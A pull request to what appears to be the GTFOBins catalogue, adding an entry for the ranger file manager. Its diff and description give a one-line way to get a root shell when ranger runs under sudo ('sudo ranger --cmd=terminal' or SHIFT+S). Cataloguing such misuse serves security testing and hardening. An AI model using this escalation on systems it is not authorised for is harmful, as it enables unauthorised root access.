### PR TITLE
Adding ranger

### DIFF
--- a/_gtfobins/ranger.md
+++ b/_gtfobins/ranger.md
@@ -1,0 +1,7 @@
+---
+description: 
+functions:
+  shell:
+    - description: 
+      code: sudo ranger --cmd=terminal
+---

--- a/_gtfobins/ranger.md
+++ b/_gtfobins/ranger.md
@@ -1,7 +1,5 @@
 ---
-description: 
 functions:
-  shell:
-    - description: 
+  shell: 
       code: sudo ranger --cmd=terminal
 ---


### PR DESCRIPTION
ranger command line file explorer doesn't drop privileges when ran with sudo. This can be exploited to gain access to a root shell. I provided a line of code but the same thing can be accomplished running sudo ranger then SHIFT+S